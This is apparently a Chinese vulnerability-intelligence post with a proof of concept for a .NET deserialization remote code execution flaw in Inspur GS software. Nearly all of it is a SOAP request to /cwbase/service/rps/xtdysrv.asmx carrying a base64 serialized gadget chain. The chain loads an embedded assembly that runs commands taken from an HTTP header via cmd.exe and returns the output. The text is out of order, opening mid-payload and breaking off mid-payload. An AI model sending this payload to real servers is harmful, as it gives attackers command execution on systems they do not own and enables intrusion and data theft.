BIAAAAAAAAAAAAAAAudGV4dAAAAOQGAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAwCYAAAAAAABIAAAAAgAFADAhAABgBQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKcwkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgoDwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm8TAAAKB28UAAAKJgdvFQAACm8WAAAKDQZvBwAACglvFwAACt4DJt4ABm8HAAAKbxgAAAoGbwcAAApvGQAACioAARAAAAAAIgCHqQADDgAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAALwBAAAjfgAAKAIAAHQCAAAjU3RyaW5ncwAAAACcBAAAJAAAACNVUwDABAAAEAAAACNHVUlEAAAA0AQAAJAAAAAjQmxvYgAAAAAAAAACAAABRxQCAAkAAAAA+iUzABYAAAEAAAAOAAAAAgAAAAEAAAAZAAAAAgAAAAEAAAABAAAAAwAAAAAACgABAAAAAAAGACkAIgAGAFYANgAGAHYANgAKAKgAnQAKAMAAnQAKAOgAnQAOABsBCAEOACMBCAEKAE8BnQAOAIYBZwEGAK8BIgAGACQCGgIGAEQCGgIGAGkCIgAAAAAAAQAAAAAAAQABAAAAEAAXAAAABQABAAEAUCAAAAAAhhgwAAoAAQARADAADgAZADAACgAJADAACgAhALQAHAAhANIAIQApAN0ACgAhAPUAJgAxAAIBCgA5ADAACgA5ADQBKwBBAEIBMAAhAFsBNQBJAJoBOgBRAKYBPwBZALYBRABBAL0BMABBAMsBSgBBAOYBSgBBAAACSgA5ABQCTwA5ADECUwBpAE8CWAAxAFkCMAAxAF8CCgAxAGUCCgAuAAsAZQAuABMAbgBcAASAAAAAAAAAAAAAAAAAAAAAAJQAAAAEAAAAAAAAAAAAAAABABkAAAAAAAQAAAAAAAAAAAAAABMAnQAAAAAABAAAAAAAAAAAAAAAAQAiAAAAAAAAAAA8TW9kdWxlPgBrd3V3YWNwdy5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBrd3V3YWNwdwBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0hlYWRlcnMAZ2V0X0l0ZW0AU3RyaW5nAENvbmNhdABzZXRfQXJndW1lbnRzAHNldF9SZWRpcmVjdFN0YW5kYXJkT3V0cHV0AHNldF9SZWRpcmVjdFN0YW5kYXJkRXJyb3IAc2V0X1VzZVNoZWxsRXhlY3V0ZQBTdGFydABTeXN0ZW0uSU8AU3RyZWFtUmVhZGVyAGdldF9TdGFuZGFyZE91dHB1dABUZXh0UmVhZGVyAFJlYWRUb0VuZABXcml0ZQBGbHVzaABFbmQARXhjZXB0aW9uAAAAD2MAbQBkAC4AZQB4AGUAAAdjAG0AZAAABy8AYwAgAAAAAAA2IZXU/G1oT7AM+EyvNpdOAAi3elxWGTTgiQMgAAEEIAEBCAiwP19/EdUKOgQAABIRBCAAEhUEIAASGQQgABIhBCABAQ4EIAASJQQgABIpBCABDg4FAAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAwAAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABrAHcAdQB3AGEAYwBwAHcALgBkAGwAbAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABrAHcAdQB3AGEAYwBwAHcALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAADgNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDwAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBiEAAAD+AVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=</printOpByte>
<printInfoByte></printInfoByte>
</SavePrintFormatAssign>
</soap:Body>
</soap:Envelope>
浪潮GS企业管理软件多处 .NET反序列化RCE漏洞poc1
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/cwbase/service/rps/xtdysrv.asmx |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SavePrintFormatAssign xmlns="http://tempuri.org/">
<psBizObj>string</psBizObj>
<psLxId>string</psLxId>
<psLxMc>string</psLxMc>
<printOpByte>AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAA